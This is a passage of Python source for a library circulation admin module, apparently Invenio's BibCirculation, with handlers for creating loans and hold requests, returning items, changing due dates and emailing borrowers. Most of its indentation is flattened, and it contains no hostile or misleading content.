Create a new loan from a hold request.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
borrower = db.get_borrower_details(borrower_id)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
return page(title=_("Create Loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def make_new_loan_from_request(req, check_id, barcode, ln=CFG_SITE_LANG):
"""
Turns a request into a loan.
@type check_id: integer.
@param check_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
recid = db.get_request_recid(check_id)
borrower_id = db.get_request_borrower_id(check_id)
borrower_info = db.get_borrower_details(borrower_id)
due_date = renew_loan_for_X_days(barcode)
if db.is_item_on_loan(barcode):
        infos.append(_('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on loan.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
return redirect_to_url(req,
'%s/admin2/bibcirculation/all_loans?ln=%s&msg=ok' % (CFG_SITE_SECURE_URL, ln))
else:
db.new_loan(borrower_id, recid, barcode, due_date,
CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN, 'normal', '')
infos.append(_('A new loan has been registered with success.'))
#try:
# register_customevent("baskets", ["display", "", user_str])
#except:
# register_exception(suffix="Do the webstat tables exists? Try with 'webstatadmin --load-config'")
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_register_new_loan(borrower_info=borrower_info,
infos=infos,
recid=recid,
ln=ln)
return page(title=_("New Loan"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_return(req, ln=CFG_SITE_LANG):
"""
    Page where it is possible to register the return of an item.
"""
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_loan_return(infos=infos, ln=ln)
return page(title=_("Loan return"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_return_confirm(req, barcode, ln=CFG_SITE_LANG):
"""
Performs the return of a loan and displays a confirmation page.
In case the book is requested, it is possible to select a request
and make a loan from it (make_new_loan_from_request)
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
loan_id = db.is_item_on_loan(barcode)
if recid is None:
infos.append(_('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_loan_return(infos=infos, ln=ln)
elif loan_id is None:
message = _("The item the with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is not on loan. Please, try again.") % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
body = bc_templates.tmpl_loan_return(infos=infos, ln=ln)
else:
library_id = db.get_item_info(barcode)[1]
if CFG_CERN_SITE:
library_type = db.get_library_type(library_id)
if library_type != CFG_BIBCIRCULATION_LIBRARY_TYPE_MAIN:
library_name = db.get_library_name(library_id)
message = _("%(x_strong_tag_open)sWARNING:%(x_strong_tag_close)s Note that item %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s location is %(x_strong_tag_open)s%(x_location)s%(x_strong_tag_close)s") % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>', 'x_location': library_name}
infos.append(message)
borrower_id = db.get_borrower_id(barcode)
borrower_name = db.get_borrower_name(borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF, barcode)
db.return_loan(barcode)
update_requests_statuses(barcode)
description = db.get_item_description(barcode)
result = db.get_pending_loan_request(recid, description)
body = bc_templates.tmpl_loan_return_confirm(
infos=infos,
borrower_name=borrower_name,
borrower_id=borrower_id,
recid=recid,
barcode=barcode,
return_date=datetime.date.today(),
result=result,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Loan return"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def claim_book_return(req, borrower_id, recid, loan_id,
template, ln=CFG_SITE_LANG):
"""
Claim the return of an item.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
recid: identify the record. It is also the primary key of
the table bibrec.
template: letter template.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
email_body = generate_email_body(load_template(template), loan_id)
email = db.get_borrower_email(borrower_id)
subject = book_title_from_MARC(int(recid))
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_borrower_notification(email=email,
subject=subject,
email_body=email_body,
borrower_id=borrower_id,
from_address=CFG_BIBCIRCULATION_LOANS_EMAIL,
ln=ln)
return page(title=_("Claim return"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def change_due_date_step1(req, barcode, borrower_id, ln=CFG_SITE_LANG):
"""
Change the due date of a loan, step1.
    loan_id: identify a loan. It is the primary key of the table
crcLOAN.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
loan_id = db.get_current_loan_id(barcode)
loan_details = db.get_loan_infos(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_change_due_date_step1(loan_details=loan_details,
loan_id=loan_id,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Change due date"),
uid=id_user,
req=req,
body=body, language=ln,
#metaheaderadd = '<link rel="stylesheet" '\
# 'href="%s/img/jquery-ui/themes/redmond/ui.theme.css" '\
# 'type="text/css" />' % CFG_SITE_SECURE_URL,
metaheaderadd = '<link rel="stylesheet" href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" '\
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def change_due_date_step2(req, new_due_date, loan_id, borrower_id,
ln=CFG_SITE_LANG):
"""
Change the due date of a loan, step2.
due_date: new due date.
    loan_id: identify a loan. It is the primary key of the table
crcLOAN.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.update_due_date(loan_id, new_due_date)
update_status_if_expired(loan_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_change_due_date_step2(new_due_date=new_due_date,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Change due date"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_request_step1(req, barcode, recid, key, string, ln=CFG_SITE_LANG):
"""
Place a new request from the item's page, step1.
barcode: identify the item. It is the primary key of the table
crcITEM.
recid: identify the record. It is also the primary key of
the table bibrec.
key: search field.
string: search pattern.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
infos = []
if key and not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_place_new_request_step1(result=None,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
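    # search_user() is assumed to return rows whose first column is the user
    # id; only that id is used below to fetch the full borrower data.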
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
if len(result) == 1:
return place_new_request_step2(req, barcode, recid,
borrowers_list[0], ln)
else:
body = bc_templates.tmpl_place_new_request_step1(result=borrowers_list,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_request_step2(req, barcode, recid, user_info, ln=CFG_SITE_LANG):
"""
Place a new request from the item's page, step2.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type user_info: list.
@param user_info: information of the user/borrower who was selected.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
body = bc_templates.tmpl_place_new_request_step2(barcode=barcode,
recid=recid,
user_info=user_info,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_request_step3(req, barcode, recid, user_info,
period_from, period_to, ln=CFG_SITE_LANG):
"""
Place a new request from the item's page, step3.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
    @type user_info: list.
    @param user_info: information of the user/borrower who was selected.
    @type period_from: string.
    @param period_from: beginning of the period of interest.
    @type period_to: string.
    @param period_to: end of the period of interest.
    @return: new request.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
(_id, ccid, name, email, phone, address, mailbox) = user_info
# validate the period of interest given by the admin
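    # validate_date_format() is assumed to expect ISO-style dates such as
    # '2013-05-02'; anything else is rejected by the two branches below.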
if validate_date_format(period_from) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sFrom: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_from, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_place_new_request_step2(barcode=barcode,
recid=recid,
user_info=user_info,
infos=infos,
ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
    elif validate_date_format(period_to) is False:
        infos = []
        infos.append(_("The period of interest %(x_strong_tag_open)sTo: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_to, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
        body = bc_templates.tmpl_place_new_request_step2(barcode=barcode,
                                                         recid=recid,
                                                         user_info=user_info,
                                                         infos=infos,
                                                         ln=ln)
        # Mirror the period_from branch above; without this return the
        # invalid request would still be registered below.
        return page(title=_("New request"),
                    uid=id_user,
                    req=req,
                    body=body,
                    language=ln,
                    navtrail=navtrail_previous_links,
                    lastupdated=__lastupdated__)
# Register request
borrower_id = db.get_borrower_id_by_email(email)
    if borrower_id is None:
db.new_borrower(ccid, name, email, phone, address, mailbox, '')
borrower_id = db.get_borrower_id_by_email(email)
req_id = db.new_hold_request(borrower_id, recid, barcode,
period_from, period_to,
CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING)
pending_request = update_requests_statuses(barcode)
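    # update_requests_statuses() is assumed to return the id of the request
    # that became pending for this barcode; the notification emails below are
    # only sent when that is the request we have just created.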
if req_id == pending_request:
(title, year, author,
isbn, publisher) = book_information_from_MARC(int(recid))
details = db.get_loan_request_details(req_id)
if details:
library = details[3]
location = details[4]
request_date = details[7]
else:
location = ''
library = ''
request_date = ''
link_to_holdings_details = CFG_SITE_URL + \
'/record/%s/holdings' % str(recid)
subject = _('New request')
message = load_template('notification')
message = message % (name, ccid, email, address, mailbox, title,
author, publisher, year, isbn, location, library,
link_to_holdings_details, request_date)
send_email(fromaddr = CFG_BIBCIRCULATION_LIBRARIAN_EMAIL,
toaddr = CFG_BIBCIRCULATION_LOANS_EMAIL,
subject = subject,
content = message,
header = '',
footer = '',
attempt_times=1,
attempt_sleeptime=10
)
send_email(fromaddr = CFG_BIBCIRCULATION_LIBRARIAN_EMAIL,
toaddr = email,
subject = subject,
content = message,
header = '',
footer = '',
attempt_times=1,
attempt_sleeptime=10
)
body = bc_templates.tmpl_place_new_request_step3(ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_loan_step1(req, barcode, recid, key, string, ln=CFG_SITE_LANG):
"""
Place a new loan from the item's page, step1.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type key: string.
@param key: search field.
@type string: string.
@param string: search pattern.
@return: list of users/borrowers.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
recid = db.get_id_bibrec(barcode)
infos = []
if key and not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_place_new_loan_step1(result=None,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
body = bc_templates.tmpl_place_new_loan_step1(result=borrowers_list,
key=key,
string=string,
barcode=barcode,
recid=recid,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_loan_step2(req, barcode, recid, user_info, ln=CFG_SITE_LANG):
"""
Place a new loan from the item's page, step2.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type user_info: list.
@param user_info: information of the user/borrower who was selected.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_place_new_loan_step2(barcode=barcode,
recid=recid,
user_info=user_info,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def place_new_loan_step3(req, barcode, recid, ccid, name, email, phone,
address, mailbox, due_date, notes, ln=CFG_SITE_LANG):
"""
Place a new loan from the item's page, step3.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type name: string.
@type email: string.
@type phone: string.
@type address: string.
    @type mailbox: string.
@type due_date: string.
@type notes: string.
@return: new loan.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
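    # Loan notes are stored as plain text, one line per note, prefixed with a
    # ctime timestamp, e.g. '[Thu May  2 10:15:00 2013] Signed slip received'.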
if notes:
notes_format = '[' + time.ctime() + '] ' + notes + '\n'
else:
notes_format = ''
#loaned_on = datetime.date.today()
borrower_id = db.get_borrower_id_by_email(email)
borrower_info = db.get_borrower_data(borrower_id)
if db.is_on_loan(barcode):
infos.append(_("Item with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is already on loan.") % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
copies = db.get_item_copies_details(recid)
requests = db.get_item_requests(recid)
loans = db.get_item_loans(recid)
purchases = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_NEW, recid)
req_hist_overview = db.get_item_requests_historical_overview(recid)
loans_hist_overview = db.get_item_loans_historical_overview(recid)
purchases_hist_overview = db.get_item_purchases(CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, recid)
title = _("Item details")
body = bc_templates.tmpl_get_item_details(
recid=recid, copies=copies,
requests=requests, loans=loans,
purchases=purchases,
req_hist_overview=req_hist_overview,
loans_hist_overview=loans_hist_overview,
purchases_hist_overview=purchases_hist_overview,
infos=infos, ln=ln)
    # None is the "borrower not found" sentinel used elsewhere in this module
    # (see place_new_request_step3), so test against it explicitly.
    elif borrower_id is not None:
db.new_loan(borrower_id, recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', notes_format)
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
title = _("New loan")
body = bc_templates.tmpl_register_new_loan(borrower_info=borrower_info,
infos=infos,
recid=recid, ln=ln)
else:
db.new_borrower(ccid, name, email, phone, address, mailbox, '')
borrower_id = db.get_borrower_id_by_email(email)
db.new_loan(borrower_id, recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', notes_format)
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
title = _("New loan")
body = bc_templates.tmpl_register_new_loan(borrower_info=borrower_info,
infos=infos,
recid=recid,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step1(req, borrower_id, p="", f="", search=None,
ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step1.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
p: search pattern.
    f: search field.
search: search an item.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
    if borrower_id is not None:
borrower = db.get_borrower_details(borrower_id)
else:
message = _('Empty borrower ID.')
return borrower_search(req, message, False, ln)
if search and p == '':
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
result = ''
elif search and f == 'barcode':
p = p.strip('\'" \t')
has_recid = db.get_id_bibrec(p)
if has_recid is None:
            infos.append(_('The barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s does not exist in the BibCirculation database.') % {'x_barcode': p, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
result = ''
else:
result = has_recid
elif search:
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
else:
result = ''
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if type(result) is types.IntType or type(result) is types.LongType:
recid = result
holdings_information = db.get_holdings_information(recid)
user_info = db.get_borrower_details(borrower_id)
body = bc_templates.tmpl_create_new_request_step2(user_info=user_info,
holdings_information=holdings_information,
recid=recid, ln=ln)
else:
body = bc_templates.tmpl_create_new_request_step1(borrower=borrower,
infos=infos,
result=result,
p=p,
f=f,
ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step2(req, recid, borrower_id, ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step2.
recid: identify the record. It is also the primary key of
the table bibrec.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
holdings_information = db.get_holdings_information(recid)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
user_info = db.get_borrower_details(borrower_id)
body = bc_templates.tmpl_create_new_request_step2(user_info=user_info,
holdings_information=holdings_information,
recid=recid, ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step3(req, borrower_id, barcode, recid,
ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step3.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
barcode: identify the item. It is the primary key of the table
crcITEM.
recid: identify the record. It is also the primary key of
the table bibrec.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
item_info = db.get_item_info(barcode)
if item_info[6] == 'Reference':
body = bc_templates.tmpl_book_not_for_loan(ln=ln)
else:
body = bc_templates.tmpl_create_new_request_step3(
borrower_id=borrower_id,
barcode=barcode,
recid=recid,
ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_request_step4(req, period_from, period_to, barcode,
borrower_id, recid, ln=CFG_SITE_LANG):
"""
Create a new request from the borrower's page, step4.
    period_from: beginning of the period of interest.
period_to: end of the period of interest.
barcode: identify the item. It is the primary key of the table
crcITEM.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
recid: identify the record. It is also the primary key of
the table bibrec.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.new_hold_request(borrower_id, recid, barcode,
period_from, period_to,
CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING)
update_requests_statuses(barcode)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_create_new_request_step4(ln=ln)
return page(title=_("New request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_loan_step1(req, borrower_id, ln=CFG_SITE_LANG):
"""
Create a new loan from the borrower's page, step1.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
borrower = db.get_borrower_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_create_new_loan_step1(borrower=borrower,
infos=infos,
ln=ln)
return page(title=_("New loan"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_new_loan_step2(req, borrower_id, barcode, notes, ln=CFG_SITE_LANG):
"""
Create a new loan from the borrower's page, step2.
borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
barcode: identify the item. It is the primary key of the table
crcITEM.
notes: notes about the new loan.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
#borrower_info = db.get_borrower_data(borrower_id)
has_recid = db.get_id_bibrec(barcode)
loan_id = db.is_item_on_loan(barcode)
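    # get_id_bibrec() doubles as an existence check (None for an unknown
    # barcode) and is_item_on_loan() returns the current loan id, if any.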
if notes:
notes_format = '[' + time.ctime() + '] ' + notes + '\n'
else:
notes_format = ''
infos = []
if has_recid is None:
infos.append(_('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.'))
borrower = db.get_borrower_details(borrower_id)
title = _("New loan")
body = bc_templates.tmpl_create_new_loan_step1(borrower=borrower,
infos=infos,
ln=ln)
elif loan_id:
infos.append(_('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on loan.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
borrower = db.get_borrower_details(borrower_id)
title = _("New loan")
body = bc_templates.tmpl_create_new_loan_step1(borrower=borrower,
infos=infos,
ln=ln)
else:
#loaned_on = datetime.date.today()
due_date = renew_loan_for_X_days(barcode)
db.new_loan(borrower_id, has_recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', notes_format)
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
result = db.get_all_loans(20)
title = _("Current loans")
infos.append(_('A new loan has been registered with success.'))
body = bc_templates.tmpl_all_loans(result=result, infos=infos, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=title,
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def all_requests(req, request_id, ln=CFG_SITE_LANG):
"""
Display all requests.
@type request_id: integer.
